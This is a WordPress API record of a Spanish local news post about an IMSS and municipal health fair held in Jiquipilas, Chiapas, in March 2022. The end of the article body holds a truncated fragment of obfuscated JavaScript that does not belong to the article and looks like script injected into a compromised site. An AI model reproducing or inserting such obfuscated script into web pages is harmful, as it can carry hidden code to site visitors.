{"id":317,"date":"2022-03-08T05:57:22","date_gmt":"2022-03-08T05:57:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=317"},"modified":"2022-03-08T05:57:24","modified_gmt":"2022-03-08T05:57:24","slug":"imss-y-ayuntamiento-realizan-jornada-y-feria-de-la-salud-en-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=317","title":{"rendered":"IMSS y Ayuntamiento realizan jornada y feria de la Salud en Jiquipilas"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"318\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM-1-1024x682.jpeg\" alt=\"\" class=\"wp-image-318\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM-1-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM-1-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM-1-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM-1-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM-1.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"319\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM-1024x682.jpeg\" alt=\"\" class=\"wp-image-319\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-07-at-9.19.32-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u2022 Llevar servicios m\u00e9dicos a zonas vulnerables, facilitando traslados y favoreciendo a la econom\u00eda de las familias.<br>\u2022 La feria de la salud continuar\u00e1 los d\u00edas 8 y 9 de Marzo.<\/p>\n\n\n\n<p>Redacci\u00f3n. <\/p>\n\n\n\n<p>7 de marzo del 2022. Jiquipilas, Chiapas.- Sumando esfuerzos para lograr el desarrollo y progreso del municipio, garantizando mejor calidad de vida a trav\u00e9s de la atenci\u00f3n medica profesional, el Ayuntamiento de Jiquipilas en coordinaci\u00f3n con el Instituto Mexicano del Seguro Social dieron incio a la jornada y feria de la Salud con diferentes servicios, en el ejido Jos\u00e9 Mar\u00eda Pino Su\u00e1rez.<\/p>\n\n\n\n<p>En el marco conmemorativo del d\u00eda internacional de la mujer, se proyecta esta brigada m\u00e9dica que lleva servicios para la atenci\u00f3n personalizada a mujeres de la comunidad, quienes son atendidas de manera profesional y dar el seguimiento correspondiente para garantizar que cuenten con una calidad de vida saludable.<\/p>\n\n\n\n<p>En esta jordana se cont\u00f3 con la presencia de Ana Lourdes Balboa Ordu\u00f1a, Coordinadora Regional de Atenci\u00f3n y Orientaci\u00f3n al Derechohabiente del IMSS en Chiapas, qui\u00e9n garantiz\u00f3 la atenci\u00f3n y que todos y todas tenga la libertad universal del acceso de servicios de salud, sin ning\u00fan costo.<\/p>\n\n\n\n<p>El edil Jiquipilteco constat\u00f3 que el proceso y desarrollo de la campa\u00f1a de Salud en el ejido no tenga contratiempo alguno.<\/p>\n\n\n\n<p>Estas campa\u00f1as son respaldadas por el equipo m\u00e9dico del municipio y DIF Municipal, qui\u00e9nes aportan profesionales y medicamentos gratuitos.<\/p>\n\n\n\n<p>Durante la campa\u00f1a se inform\u00f3 que se encuentra a disposici\u00f3n las instalaci\u00f3n y colaboradores para atenci\u00f3n medica durante la semana.<\/p>\n\n\n\n<p>Puntualiz\u00f3 que los recursos p\u00fablicos son invertidos en prioridades necesarias de la ciudadan\u00eda, el tema de salud es muestra de atenci\u00f3n urgente y que la atenci\u00f3n primordial garantiza una estabilidad social y estrategias para mejorar los servicios.<\/p>\n\n\n\n<p>El alcalde agradeci\u00f3 el apoyo y respaldo del director general de IMSS para poder llevar a cabo la feria de la salud en el municipio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 Llevar servicios m\u00e9dicos a zonas vulnerables, facilitando traslados y favoreciendo a la econom\u00eda de las familias.\u2022 La feria de la salud continuar\u00e1 los d\u00edas 8 y 9 de Marzo. Redacci\u00f3n. 7 de marzo del 2022. Jiquipilas, Chiapas.- Sumando esfuerzos para lograr el desarrollo y progreso del municipio, garantizando mejor calidad de vida a trav\u00e9s &hellip;<\/p>\n","protected":false},"author":2,"featured_media":319,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-317","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/317","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=317"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/317\/revisions"}],"predecessor-version":[{"id":320,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/317\/revisions\/320"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/319"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=317"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=317"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=317"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}